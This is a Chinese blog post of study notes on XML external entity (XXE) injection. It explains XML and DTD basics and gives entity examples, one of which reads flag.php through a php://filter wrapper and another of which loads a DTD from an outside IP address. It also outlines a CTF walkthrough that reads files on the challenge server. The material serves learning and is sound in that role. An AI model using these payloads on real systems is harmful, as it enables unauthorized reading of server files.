XXE学习笔记

最新推荐文章于 2022-11-02 15:27:00 发布
最新推荐文章于 2022-11-02 15:27:00 发布
阅读量171 收藏
点赞数 1
文章标签: xml
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52560434/article/details/119531181
版权

文章目录

前言

这里主要记录一下这几天学习xxe的内容,以及自己的一些心得体会

以下是本篇文章正文内容

一、XXE概念

XXE全称是XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。

二、基础知识

1.XML

1、特征
✦ XML是可扩展标记语言(EXtensible Markup Language),是一种很像HTML的标记语言。
✦XML被设计用来传输和存储数据,HTML则用来显示数据
✦XML标签没有被预定义,需要自定义标签
✦是W3C的推荐标准

2、XML文档结构
✦XML声明
✦DTD文档类型定义
✦文档元素
基本框架如下:

<!--这是注释-->
<!--XML声明-->
<?xml version="1.0"?>

<!--文档类型定义-->
<!DOCTYPE note [  <!--定义此文档是 note 类型的文档-->
<!ELEMENT note (to,from,heading,body)>  <!--定义note元素有四个元素-->
<!ELEMENT to (#PCDATA)>     <!--定义to元素为”#PCDATA”类型-->
<!ELEMENT from (#PCDATA)>   <!--定义from元素为”#PCDATA”类型-->
<!ELEMENT head (#PCDATA)>   <!--定义head元素为”#PCDATA”类型-->
<!ELEMENT body (#PCDATA)>   <!--定义body元素为”#PCDATA”类型-->
]]]>
<!--文档元素-->
<note>
<to>Dave</to>
<from>Tom</from>
<head>Reminder</head>
<body>You are a good man</body>
</note>

2.DTD介绍

DTD:Document Type Definition 即文档类型定义,用来为XML文档定义语义约束,也就是说,DTD是用来规范XML文档的格式的。可以嵌入在XML文档中(内部声明),也可以独立的放在一个文件中(外部引用)。

DTD一般认为有两种引用或声明方式:
1、内部DTD:即对XML文档中的元素、属性和实体的DTD的声明都在XML文档中。
2、外部DTD:即对XML文档中的元素、属性和实体的DTD的声明都在一个独立的DTD文件(.dtd)中。
(网上有提到的引用公共DTD其实也算外部引用DTD的一种)

一下是几种实体的格式:
✦内部实体

<!DOCTYPE note [
    <!ENTITY a "admin">
]>
<note>&a</note>
<!-- admin -->

✦内部参数实体

<!DOCTYPE note> [
    <!ENTITY % b "<!ENTITY b1 "awsl">">
    %b;
]>
<note>&b1</note>
<!-- awsl -->

✦外部实体

<!DOCTYPE note> [
    <!ENTITY c SYSTEM "php://filter/read=convert.base64-encode/resource=flag.php">
]>
<note>&c</note>
<!-- Y2w0eV9uZWVkX2FfZ3JpbGZyaWVuZA== -->

✦外部参数实体

<!DOCTYPE note> [
    <!ENTITY % d SYSTEM "http://47.106.143.26/xml.dtd">
    %d;
]>
<note>&d1</note>
<!-- Y2w0eV9uZWVkX2FfZ3JpbGZyaWVuZA== -->


参数实体用% name申明,引用时用%name;,只能在DTD中申明,DTD中引用。
其余实体直接用name申明,引用时用&name;,只能在DTD中申明,可在xml文档中引用
外部引用可支持http,file等协议,不同的语言支持的协议不同,但存在一些通用的协议,具体内容如下所示:

三、XXE漏洞原理及相关题目

1、原理

刚才介绍过,XXE(XML External Entity Injection) 全称为 XML 外部实体注入,从名字就能看出来,这是一个注入漏洞,注入的是XML外部实体,注意这四个字,外部实体。如果能注入外部实体并且成功解析的话,这就会大大拓宽我们 XML 注入的攻击面。

2、题目

当允许引用外部实体时,通过构造恶意内容,可导致读取任意文件、执行系统命令、探测内网端口、攻击内网网站等危害。
xxe 漏洞触发的点往往是可以上传 xml 文件的位置,没有对上传的 xml 文件进行过滤,导致可上传恶意 xml 文件。
题目链接http://web.jarvisoj.com:9882/

在这里插入图片描述点击链接没有明显的回应,查看源码没有什么有用的信息,尝试抓包

在这里插入图片描述尝试将将Content-Type: application/json修改为 Content-Type: application/xml 构造XXE,先内部注入,看xml是否能被解析
在这里插入图片描述可以被解析,先尝试外部注入,
在这里插入图片描述

发现可以读取文件,在这里插入图片描述找到flag

这篇文章详细讲了xxe漏洞许多其他方面的应用,这里就不多说了
https://xz.aliyun.com/t/3357#toc-5

总结

总的来说,知识面还是比较狭窄,只是对之前学习的关于xxe的基础知识进行大概的总结,还有许多细节方面没有写完整,对于xxe漏洞复现和实操还没有过多的深入。笔者将会继续学习这方面的知识,争取对xxe有更深的认识
参考文献:https://www.cnblogs.com/20175211lyz/p/11413335.html
https://xz.aliyun.com/t/3357#toc-4
https://xz.aliyun.com/t/3357#toc-24

yeaherey
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XXE笔记
m0_47599604的博客
03-28 122
目录 XML及DTD介绍 简介 DTD PCDATA CDATA 实体 内部实体声明 XXE漏洞介绍 挖掘技巧及修复 挖掘方式 漏洞利用 漏洞修复 XML及DTD介绍 简介 XML指可扩展标记语言(EXtensible Markup Lanuage),设计用来进行数据的传输和存储。 XML是一种标记语言,很类似HTML XML的设计宗旨是传输数据,而非显示数据 XML标签没有被定义。需要自行定义标签 XML被设计为具有自我描述性 XML是W3C的推荐标准
XXE漏洞笔记
公众号shadow sock7
06-30 2941
参考: http://wooyun.jozxing.cc/static/bugs/wooyun-2014-059911.html http://bobao.360.cn/learning/detail/3841.html http://blog.csdn.net/u011721501/article/details/43775691 http://thief.one/2017/06/20/1
学习笔记-XXE
人饭子的博客
11-02 189
XXE 免责声明 本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关. 描述 XXE 就是 XML 外部实体注入。当允许引用外部实体时,通过构造恶意内容,就可能导致任意文件读取、系统命令执行、内网端口探测、攻击内网网站等危害。 XML 文档结构包括 XML 声明、DTD 文档类型定义(可选)、文档元素。文档类型定义 (DTD) 的作用是定义 X...
XXE总结
bylfsj的博客
11-22 431
https://www.cnblogs.com/backlion/p/9302528.html
XXE - 防御策略-01
09-15
XXE 防御策略 XXEXml External Entity)漏洞是一种常见的 XML 解析漏洞,攻击者可以通过构造恶意 XML 文档来读取敏感信息或执行系统命令。为了防御 XXE 漏洞,需要了解其成因和防御策略。 一、XXE 漏洞消亡原因 ...
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXE 漏洞利用 - 任意文件读取 无回显 XXEXML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXEXML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞。XML是一种标记语言,常用于数据交换,而外部实体是XML文档的一部分,允许引用外部资源,如文件系统、网络...
5、XXE漏洞pdf资料
最新发布
10-15
XXEXML External Entity)漏洞是针对XML解析器的安全漏洞,它发生在XML解析器处理包含外部实体引用的恶意XML输入时。XML(eXtensible Markup Language)是一种用于存储和传输数据的标记语言,它的主要特点是允许...
WEB安全的总结学习与心得(十三)——XXE实体注入漏洞
weixin_44681434的博客
01-29 358
WEB安全的总结与心得(十三) 01 文件操作 操作内容 文件上传 上传Webshell;上传木马 文件下载 下载系统任意文件;下载程序代码 常见文件操作漏洞 文件上传漏洞;任意文件下载漏洞;文件包含漏洞 02 ...
XXE漏洞概述
爱党人士
05-24 1154
XXE(xml external entity -injection") 是xml的外部文档的一种注入漏洞。 首先来看一下xml的大体结构: DTD:Document Type Definition 即文档类型定义,用来为XML文档定义语义约束。 主要出问题的大多是从DTD这部分出的。 DTD大体框架: DTD 内部声明 <! DOCTYPE 根元素 [元素声明]> DTD 外部...
XXE-什么是XXE
qq_45514735的博客
03-05 2067
简单来说,XXE就是XML外部实体注入。 当允许引用外部实体时,通过构造恶意内容, 就可能导致任意文件读取、系统命令执行、 内网端口探测、攻击内网网站等危害。 XML XML用于标记电子文件使其具有结构性的标记语言,可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素 DTD DTD(文档类型定义)的作用是定义 XML 文档的合法构建模块。 DTD 可以在 XML 文档内声明,也可以外部引用。...
xxe漏洞简介
u011066706的专栏
04-17 4123
xxe漏洞无法复现原因 主要是simplexml_load_file这个函数的问题,在旧版本中是默认解析实体的,但是在新版本中,已经不再默认解析实体了,需要在simplexml_load_file函数中指定第三个参数为LIBXML_NOENT,不然不会解析实体的。 xxe实体注入详解 0x00背景 XXE Injection即XML External Entity Injec
初识XXE漏洞
Websec
03-22 1万+
0X01:何为XXE漏洞?XXE是指xml外部实体攻击0x02:那么xml是什么?xml实体攻击是什么?XML百度是这样子的:可扩展标记语言,标准通用标记语言的子集,是一种用于标记电子文件使其具有结构性的标记语言。在电子计算机中,标记指计算机所能理解的信息符号,通过此种标记,计算机之间可以处理包含各种的信息比如文章等。它可以用来标记数据、定义数据类型,是一种允许用户对自己的标记语言进行定义的源语言...
XXE知识总结,有这篇就够了!
热门推荐
南迪叶先森
07-14 2万+
公粽号:黒掌 一个专注于分享渗透测试、黑客圈热点、黑客工具技术区博主! XXE基础 XXE(XML External Entity Injection)全称为XML外部实体注入,由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。例如PHP中的simplexml_load默认情况下会解析外部实体,有XXE漏洞的标志性函数为simplexml_load_string()。而学习XXE要从认识XML开始。 XML基础 XML 指可扩展标记语言(EXtensible Markup Lang.
XXE漏洞深入探索:从新手到高手
"XXEXML External Entity)漏洞是一种安全问题,主要出现在处理XML文档的程序中,允许攻击者通过恶意构造的XML输入来访问服务器的...作为一名渗透测试者,你需要不断学习和实践,才能在这个领域成为真正的"Jedi"。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值